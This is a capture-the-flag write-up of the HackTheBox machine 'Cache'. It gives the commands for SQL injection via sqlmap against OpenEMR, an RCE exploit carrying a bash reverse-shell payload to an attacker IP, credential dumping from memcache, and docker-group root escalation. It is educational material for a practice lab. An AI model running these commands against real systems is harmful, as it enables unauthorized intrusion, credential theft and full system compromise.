Cache – HackTheBox writeup
info

Cache is a retired vulnerable Linux machine available from HackTheBox. The machine maker is ASHacker, thank you. It has an Medium difficulty with a rating of 5 out of 10.

Kali Linux is used to carry out the enumeration, exploitation and privilege escalation. The goal is to obtain root shell together with both user & root flags.

Exploitation Summary (tap to reveal)

Initial Exploitation

  • Vulnerability: Credentials exposure through SQL Injection and then Remote Code Execution via OpenEMR
  • Explanation: OpenEMR software has multiple vulnerabilities. SQL Injection on page add_edit_event_user.php gets us the credentials needed to exploit Remote Code Execution vulnerability

Lateral Movement – from www-data

  • Vulnerability: Credentials exposure through web file
  • Explanation: Credentials are exposed on javascript file functionality.js

Lateral Movement – from ash

  • Vulnerability: Credentials exposure through memcache
  • Explanation: Credentials are stored in cache service memcache.

Privilege Escalation

  • Vulnerability: Docker group vulnerability
  • Explanation: A docker vulnerability allows user of member docker to break out of docker container and gain access as root

Enumeration

nmap -p- -A -T4 10.10.10.188
nmap
TCP 22: OpenSSH 7.6p1
TCP 80: Apache httpd 2.4.29

Initial Exploitation

Only 2 ports are open: SSH & HTTP website. Most likely port 80 would be where we find information & vulnerabilities to get in. So let’s see what we have here:

homepage

The website talks about hacking. Following links to check out other webpages show 2 pages that are intersting: login.html & author.html. Let’s look at them 1 by 1.

login page

When I look at the source code of the page, it shows that the login request would be sent to net.html. Also, there’s a javascript file called functionality.js. Let’s check out net.html first.

login.html source

That’s interesting, typically .html files are static and would not be able to process request. Let’s try to access it directly.

It redirects back to login.html. But if you try to access it using view-source:, you can see the source code of net.html (of course you can also use curl)

net.html

It is a simple page that shows an image:

net image

That’s a cool image but other than that login.html doesn’t lead us to more interesting things. Now take a look at functionality.js:

functionality.js

This javascript reveals that the login credentials and validation are hard coded in the file. We can find user ash with password H@v3_fun. Using the credentials to login brings us to net.html page. A quick run of the credentials at SSH has failed. That’s about as far as we can go from this. But we do find some credentials that may be useful later on.

Let’s check the other web page author.html

author.html

This page shows CEO name ASH, domain name cache.htb and some interesting projects Cache & HMS. So ash could be a valid user of the system and the machine can possibly have virtual hosts including cache.htb.

I then add cache.htb to /etc/hosts to see if it would resolve to a different website. But unfortunately, it returns the same webpage.

Next is to try finding any sub-domains using gobuster:

gobuster vhost -u http://cache.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt | grep -v "Status: 400"

I use grep -v to exclude sub-domains that return Bad Request 400 error. Those are not valid sub-domains. The search does not return any valid sub-domains. Next is trying to find another valid domain. To do that, I add htb to /etc/hosts and run another gobuster scan:

gobuster vhost -u http://htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt | grep -v "Status: 400"
gobuster vhost

Great! We finally find another valid domain hms.htb. HMS (Hospital Management System) is another project author Ash is working on. Let’s check it out:

openemr

It brings us to a new website showing OpenEMR login screen. Credentials we obtained do not work here. We will ask Google for help to see if OpenEMR has any vulnerabilities.

google search

The first vulnerability I find is Remote Code Execution, exactly what we need. But we need credentials to execute this exploit. Looks like we need to find some valid credentials first.

The 2nd highlighted links bring us to a pdf file listing a bunch of OpenEMR’s vulnerabilities. Based on section 2, we can access some URLs without authentication simply by navigating to registration page of the Patient Portal. Then section 3 listed some URLs that are vulnerable to SQL Injection.

URLs that are affected by both section 2 & 3 are:

  • add_edit_event_user.php
  • find_appt_popup_user.php
  • get_profile.php

And based on the information, /portal is the Patient Portal page. Let’s see:

patient portal

Yup. Able to access Patient Portal. The credentials doesn’t work here either. Anyway, let’s follow the instructions to exploit SQL Injection vulnerabilities. I go with the first URL:

http://hms.htb/portal/add_edit_event_user.php?eid=1

When I enter the URL, it brings me back to the login page. It’s a protected page but we can bypass protection by clicking on the Register button, as described in section 2 of the pdf file.

query error

We are greeted with a Query Error. Sounds good. I would now use sqlmap to test the vulnerability. To successfully run the test, we need the cookie:

  • press F12 on FireFox
  • at debug console, click Console
  • type document.cookie
cookie

Now run the sqlmap test:

sqlmap --cookie="PHPSESSID=327f74o2sjv7t5spbpqmkd0fuv" -u http://hms.htb/portal/add_edit_event_user.php?eid=1
sqlmap

Test result confirms that the URL is vulnerable to SQL Injection. After trying out different sqlmap tests, I am able to retrieve more credentials through SQL Injection:

sqlmap --cookie="PHPSESSID=327f74o2sjv7t5spbpqmkd0fuv" -u http://hms.htb/portal/add_edit_event_user.php?eid=1 --dump -T users_secure -C username,password,salt
hash

Sweet! Time to call out John to get me the password:

openemr credentials

We find OpenEMR credentials: openemr_admin:xxxxxx

We can now go back to the Remote Code Execution vulnerability and try to obtain a shell. The exploit is available as 45161.py at searchsploit. We first start netcat listening to port 4000:

nc -nvlp 4000

Then execute the exploit as follow:

python 45161.py -u openemr_admin -p xxxxxx -c "bash -i >& /dev/tcp/10.10.14.35/4000 0>&1" http://hms.htb
rce exploit
Execute RCE exploit successfully
initial shell

Initial shell obtained.

Lateral Movement – from www-data

A quick check at /etc/passwd shows that ash is a valid user and we are able to login as ash using the initial credentials (H@v3_fun) obtained.

shell as ash

Great! We gain access as ash and also obtain the user flag!

Lateral Movement – from ash

When checking out the /etc/passwd, we also notice that there is another user catching my eyes: memcache. memcache is a software to provide in-memory caching using port 11211. Looking at the listening ports confirms that memcache service is running:

netstat -na
memcache

We can use telnet to connect to memcache service. After playing with the service for a bit, I am able to dump another set of credentials using the following command in memcache:

stats cachedump 1 0
get user
get passwd
memcache dump

Password for user luffy obtained: 0n3_p1ec3. With this credentials, I am able to login using SSH.

luffy shell

Gain access as luffy!

Privilege Escalation

A quick check on user luffy shows that luffy is a member of group docker.

member docker

This is not a normal group a typical user will be a member of. A quick search on Google shows that it’s possible to perform privilege escalation as a member of group docker.

docker privesc

GTFOBins is an awesome website showing you privilege escalation techniques for different softwares/tools.

docker privesc command

Awesome. By using docker image ls command, I am able to find the docker image I can take advantage of and then modify and execute the privilege escalation command brings me to root shell:

docker image ls
docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
root shell

Perfect! We gain access as root and obtain the root flag!

Leave a Reply

Close Menu